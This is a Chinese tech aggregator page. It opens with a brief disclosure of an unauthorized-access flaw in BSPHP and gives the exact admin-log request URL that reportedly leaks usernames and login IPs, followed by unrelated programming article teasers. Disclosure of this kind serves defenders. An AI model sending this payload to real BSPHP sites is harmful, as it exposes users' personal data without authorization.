当前位置：首页 > news >正文

BSPHP 未授权访问信息泄露

news 2025/7/9 13:44:06

漏洞描述

BSPHP 存在未授权访问泄露用户 IP 和账户名信息

漏洞复现

访问url：

构造payload访问：

/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0%E2%80%98

泄露用户名与登录IP：
在这里插入图片描述
文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公众号：
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社区：
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf：
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

BSPHP 未授权访问信息泄露

漏洞描述 BSPHP 存在未授权访问泄露用户 IP 和账户名信息漏洞复现访问url： 构造payload访问： /admin/index.php?madmin&clog&atable_json&jsonget&soso_ok1&tuser_login_log&page1&limit10&bsphptime16004073…...

编程日记 2023/10/14 20:19:51

Learning Sample Relationship for Exposure Correction 论文阅读笔记

这是中科大发表在CVPR2023的一篇论文，提出了一个module和一个损失项，能够提高现有exposure correction网络的性能。这已经是最近第三次看到这种论文了，前两篇分别是CVPR2022的ENC（和这篇文章是同一个一作作者）和CVPR20…...

编程日记 2023/10/14 20:18:50

Vue项目 -- 解决Eslint导致的console报错问题

在利用vue-cli3构建的项目中引入eslint进行语法检查时，使用console.log(‘xxx’)时，控制台抛出了Unexpected console statement (no-console) 异常， 例：一使用console就提示报错解决办法是： 在 .eslintrc.js 文件中…...

编程日记 2023/10/14 20:17:49

原数据对象 flowData: {list: [], // 数据值column: 2, // 瀑布列数columnSpace: 2 // 瀑布列宽间距 } 动态添加后的数据对象 flowData: {list: [], // 数据值column: 2, // 瀑布列数columnSpace: 2, // 瀑布列宽间距column_1: [],column_2: [] } 动态添加更多的数据对象的…...

编程日记 2023/10/14 20:15:47

【LeetCode】17. 电话号码的字母组合

1 问题给定一个仅包含数字 2-9 的字符串，返回所有它能表示的字母组合。答案可以按任意顺序返回。给出数字到字母的映射如下（与电话按键相同）。注意 1 不对应任何字母。示例 1： 输入：digits “23” 输出&…...

编程日记 2023/10/14 20:13:42

使用 Apache Kafka 进行发布-订阅通信中的微服务

发布-订阅消息系统在任何企业架构中都发挥着重要作用，因为它可以实现可靠的集成，而无需紧密耦合应用程序。在解耦的系统之间共享数据的能力并不是一个容易解决的问题。考虑一家拥有多个使用不同语言和平台独立构建的应用程序的企业。它需要响应地共享数…...

编程日记 2023/10/14 20:12:40

valarray 包含对象成员的类（cpp14章）

C代码重用 1.公有继承可以实现 2.包含、私有继承、保护继承用于实现has-a关系，即新的类将包含另一个类的对象。 （使用这样类成员：本身是另外一个类对象称为包含 （组合或层次化）。） 3.函数模板、类模…...

编程日记 2023/10/14 20:11:38

2023双11笔记本电脑候选名单(截止2023.10.13的价格,双十一活动可能会更便宜一点)

以下是我最近几天查阅抖音,B站,知乎,百度,朋友后候选出来的一些6000-8000的游戏本电脑,标绿的属性是相比之下较为优秀的附上几个网上的CPU和显卡排行网站 CPU性能排行榜 - CPU天梯图 - 最强CPU2023(较为全面的CPU排行,收录四千多款) 笔记本性能排行榜 - 快科技天梯榜笔记本CP…...

编程日记 2023/10/14 20:10:37

Springcloud笔记（4）-客户端负载均衡Ribbon

Ribbon是一个基于HTTP和TCP的客户端负载均衡工具，不需要独立部署，几乎存在于每一个springcloud构建的微服务和基础设施中。微服务间调用，API网关的请求转发都通过Ribbon实现。负载均衡通常所说的负载均衡都是指的服务端负载均衡&#xf…...

编程日记 2023/10/14 20:09:35

MediaRecorder媒体录音机

权限： <uses-permission android:name"android.permission.RECORD_AUDIO"/> <uses-permission android:name"android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name"android.permission.READ_EXTE…...

编程日记 2023/10/14 20:08:34

短视频如何批量添加水印

在当今的数字时代，短视频已经成为一种非常流行的内容形式。无论是社交媒体还是视频分享网站，短视频都已经成为了一种非常有吸引力的内容。然而，对于一些拥有大量视频内容的创作者来说，添加水印可能是一项繁琐的任务。本文将介绍如…...

编程日记 2023/10/14 20:07:32

RT-Thread MQTT（学习）

MQTT背景应用 MQTT是机器对机器（M2M）/物联网（IoT）连接协议，英文全名为“Message Queuing Telemetry Transport”，“消息队列遥测传输”协议。它是专为受限设备和低带宽、高延迟或不可靠的网络而设计的&…...

编程日记 2023/10/14 20:06:31

Vue_Bug VUE-ELEMENT-ADMIN默认是英文模式

Bug描述： VUE-ADMIN-TEMPLATE-MASTER VUE-ELEMENT-ADMIN-MASTER 两个项目直接从GitHub上拉取下来默认是英文模式其他信息： 这两个项目默认支持中文语言包，无需额外引入，只需删除英文语言包依赖 //import enLang from element-…...

编程日记 2023/10/14 20:05:29

Spark中的Driver、Executor、Stage、TaskSet、DAGScheduler等介绍

工作流程： Driver 创建 SparkSession 并将应用程序转化为执行计划，将作业划分为多个 Stage，并创建相应的 TaskSet。Driver 将 TaskSet 发送给 TaskScheduler 进行调度和执行。TaskScheduler 根据资源情况将任务分发给可用的 Executor 进程执…...

编程日记 2023/10/14 20:04:28

docker的资源限制参数设置错误，导致的clickhouse性能瓶颈

使用场景我们使用docker作为服务的虚拟化工具，服务都部署在docker里我们使用docker-compose管理所有docker服务的配置文件针对某些服务，我们要限制这个docker占用的资源数量，例如，cpu和内存在进行配置时，网上搜了一些…...

编程日记 2023/10/14 20:03:26

Vue路由守卫有哪些，怎么设置，有哪些使用场景？

Vue 路由守卫是在 Vue Router 中提供的一种功能，它允许您在导航到某个路由前、路由变化时或导航离开某个路由时执行代码。Vue 路由守卫提供了以下几种类型： 1.全局前置守卫 router.beforeEach 在进入路由前执行的钩子函数，它会接收三个参数&a…...

编程日记 2023/10/14 20:02:26

云原生网关可观测性综合实践

作者：钰诚可观测性可观测性（Observability）是指系统、应用程序或服务的运行状态、性能和行为能够被有效地监测、理解和调试的能力。随着系统架构从单体架构到集群架构再到微服务架构的演进，业务越来越庞大，也越来…...

编程日记 2023/10/14 20:01:25

vue-element-admin—登录页面添加自定义背景

一、效果图初始效果： 更改背景后效果： 二、操作步骤 1、准备图片 2、更改代码打开下面路径的 index.vue 文件： vue-element-admin-master\src\views\login\index.vue 也就是登录页面。对 .login-container 样式代码块内代码做如下…...

编程日记 2023/10/14 20:00:24

软设上午题-错题知识点一

软设上午题-错题知识点一 1、ipconfig 显示信息； ipconfig /all 显示详细信息 ，可查看DHCP服务是否已启用； ipconfig /renew 更新所有适配器； ipconfig /release 释放所有匹配的连接。 2、耦合性也叫块间联系。指软件系统结构中各…...

编程日记 2023/10/14 19:59:23

微信小程序（小程序入门）

一，介绍 1、什么是小程序小程序是一种轻量级的应用程序，可以在移动设备上运行，不需要用户下载和安装。它们通常由企业或开发者开发，用于提供特定功能或服务。微信小程序（wei xin xiao cheng xu）&#xf…...

编程日记 2023/10/14 19:58:22

RocketMQ延迟消息机制

两种延迟消息 RocketMQ中提供了两种延迟消息机制指定固定的延迟级别通过在Message中设定一个MessageDelayLevel参数，对应18个预设的延迟级别指定时间点的延迟级别通过在Message中设定一个DeliverTimeMS指定一个Long类型表示的具体时间点。到了时间点后&#xf…...

编程新知 2025/7/1 20:41:53

css实现圆环展示百分比，根据值动态展示所占比例

代码如下 <view class""><view class"circle-chart"><view v-if"!!num" class"pie-item" :style"{background: conic-gradient(var(--one-color) 0%,#E9E6F1 ${num}%),}"></view><view v-else …...

编程新知 2025/7/8 21:31:50

从WWDC看苹果产品发展的规律

WWDC 是苹果公司一年一度面向全球开发者的盛会，其主题演讲展现了苹果在产品设计、技术路线、用户体验和生态系统构建上的核心理念与演进脉络。我们借助 ChatGPT Deep Research 工具，对过去十年 WWDC 主题演讲内容进行了系统化分析，形成了这份…...

编程新知 2025/7/5 23:44:54

在四层代理中还原真实客户端ngx_stream_realip_module

一、模块原理与价值 PROXY Protocol 回溯第三方负载均衡（如 HAProxy、AWS NLB、阿里 SLB）发起上游连接时，将真实客户端 IP/Port 写入 PROXY Protocol v1/v2 头。Stream 层接收到头部后，ngx_stream_realip_module 从中提取原始信息…...

编程新知 2025/7/6 17:42:11